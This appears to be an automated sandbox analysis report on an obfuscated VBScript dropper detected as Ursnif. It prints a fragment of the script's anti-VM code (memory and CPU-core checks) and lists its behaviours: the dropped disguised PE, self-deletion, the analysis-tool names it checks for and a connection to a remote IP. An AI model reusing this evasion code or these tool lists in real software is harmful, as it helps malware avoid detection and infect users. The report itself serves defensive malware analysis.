Anti Malware Scan Interface: WScript.Sleep 2000If (InStr(WScript.ScriptName, cStr(820652900)) > 0 And uiwkQH = 0) ThenExit FunctionEnd If' Kankakee blasphemy sunrise bramble screwworm ho religiosity. 8769309 hoot ambitious foppish grandmother tutu widen754 passerby scratchy892 bossy109. Verde274 Byrne. 4049332 Set AlphonseService = GetObject("winmgmts:\\.\root\cimv2")Set kdDsaHAdlItems = AlphonseService.ExecQuery("Select * from Win32_ComputerSystem")For Each rTSNo In kdDsaHAdlItemsKlcIhm = KlcIhm + Int((rTSNo.TotalPhysicalMemory) / (((81 - 2.0) + (1055520 - 278.0)) - 6745.0))NextIf KlcIhm < ((8197 - (7235 - 89.0)) - (22 - 1.0)) ThenHThYFgq' novo Auckland shrewd freedman persecutory thieves745 videotape Vega regent snowy cop cremate committee126 reticulum995 spigot charisma50 End IfREM regress bangle, 8711784 insubstantial359 michigan effectuate Reagan sin770 earmark discriminant notate. purify, conversion571 standeth vane ' sidereal600 evocate dance denude burst automorphism uranium Aldrich diffract stamp Bergland signal groan railway Erik villa Leon commendatory peptide alga End FunctionFunction spurn163()REM afternoon Barnhard230. alga500 whale Britain torso rapture slid indecomposable trudge Filipino. bazaar, big Hahn, cookery guilty debase, 419631 culprit Leland critic lusty cantor pater tate IEEE ceramic, 7701 crunchy verdict. effete, boulder voyage717 on error resume nextIf (InStr(WScript.ScriptName, cStr(820652900)) > 0 And uiwkQH = 0) Then' peak Bethlehem Terre Posner stifle Agee quartermaster204 NH dauphin nomad their neither scarves Exit FunctionREM autocollimate Giuliano attainder isle epidemic longue spoonful ambulant j Cinderella influenza hydrous Finn. Methuselah attune rectitude cervix End IfSet AlphonseService = GetObject("winmgmts:\\.\root\cimv2")Set kdDsaHAdlItems = AlphonseService.ExecQuery("Select * from Win32_Processor", , (((4 + 300.0) - 267.0) + (28 - 17.0)))' Kelvin scoff castor niece bump fiefdom491 lap sing thieving yearbook hydroxide. milestone rule. regrettable, vivify. 2683417 Lausanne ounce complain For Each rTSNo In kdDsaHAdlItems' roundworm glad capitol beachhead. nay Malthus replica. acquaint ampere iodine vermilion saw If rTSNo.NumberOfCores < ((25 - (22 - (15 - 13.0))) - 2.0) Thenchaotic = True' bipolar dodecahedral518 indium polysemous documentation262 capacitance tine thicken stature crest187 petition adject spectrography polymeric howdy. sheave taft112 indubitable, conjuncture near End IfNextIf chaotic Then' industrial Allegheny bedstraw bestubble variety hornmouth Wilshire813 impute281 audiotape circumsphere retrofit botanic197 cotty caught grouse county irreverent. 7472456 nursery concertina. 7200157 Rena. 6227331 adipic tetravalent. 3544323 typeset bronco python possessor383 boil, spasm377 Carl HThYFgqEnd IfREM shenanigan tenebrous Borden Peruvian jackpot966 eke GU whatnot Burr Netherlands permafrost. 3030829 autocorrelate nectar recipe game hazel kayo Bose thereby blew extra End FunctionFunction tUtsn(PKdEVC)on error resum

Persistence and Installation Behavior:

Creates processes via WMI

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops PE files

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\Oxnard.rb

Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\Oxnard.rb

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Source: Yara match	File source: 00000007.00000003.841219747.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841280724.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.844945859.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841043510.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841145092.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841189737.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841251106.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841003286.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841100047.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY

Deletes itself after installation

Source: C:\Windows\System32\wscript.exe

File deleted: c:\users\user\desktop\view_attach_72559.vbs

Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Disables application error messsages (SetErrorMode)

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp	Binary or memory string: BEHAVIORDUMPER.EXE@Q
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp	Binary or memory string: IMPORTREC.EXE@
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp	Binary or memory string: HOOKEXPLORER.EXE@
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp	Binary or memory string: FORTITRACER.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp	Binary or memory string: APISPY.EXE@
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp	Binary or memory string: IMUL.EXE@.8
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp	Binary or memory string: SCKTOOL.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp	Binary or memory string: PEID.EXE@#Z
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp	Binary or memory string: HOOKANAAPP.EXE@
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp	Binary or memory string: AUTORUNSC.EXEH
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp	Binary or memory string: SYSANALYZER.EXE@A
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: FORTITRACER.EXEA
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp	Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE@
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp	Binary or memory string: PROCMON.EXE@
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp	Binary or memory string: SBIECTRL.EXE@
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp	Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.712764101.000001C8B3A55000.00000004.00000001.sdmp	Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp	Binary or memory string: IDAG.EXE@:V
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp	Binary or memory string: SANDBOXIERPCSS.EXE@V5
Source: wscript.exe, 00000000.00000003.712764101.000001C8B3A55000.00000004.00000001.sdmp	Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp	Binary or memory string: IDAQ.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp	Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp	Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE@
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp	Binary or memory string: PETOOLS.EXE@J
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp	Binary or memory string: AUTORUNS.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.712764101.000001C8B3A55000.00000004.00000001.sdmp	Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp	Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: DUMPCAP.EXE

Contains capabilities to detect virtual machines

Source: C:\Windows\System32\wscript.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\wscript.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Oxnard.rb

Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\wscript.exe TID: 5588

Thread sleep time: -30000s >= -30000s

Jump to behavior

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor

Checks the free space of harddrives

Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\Users\user\AppData\Local FullSizeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation			Jump to behavior

Enumerates the file system

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Documents\desktop.ini			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local\Temp			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Desktop\desktop.ini			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local			Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: wscript.exe, 00000000.00000003.711820977.000001C8B6690000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.711801004.000001C8B6389000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWa

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Source: C:\Windows\System32\wscript.exe

File created: Oxnard.rb.0.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 88.99.66.31 187

Jump to behavior

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation			Jump to behavior

Queries the cryptographic machine GUID

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)

Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp	Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp	Binary or memory string: autoruns.exe
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp	Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	Binary or memory string: regshot.exe

Stealing of Sensitive Information:

Yara detected Ursnif

Source: Yara match	File source: 00000007.00000003.841219747.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841280724.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.844945859.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841043510.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841145092.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841189737.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841251106.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841003286.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841100047.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Source: Yara match	File source: 00000007.00000003.841219747.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841280724.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.844945859.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841043510.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841145092.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841189737.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841251106.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841003286.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841100047.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY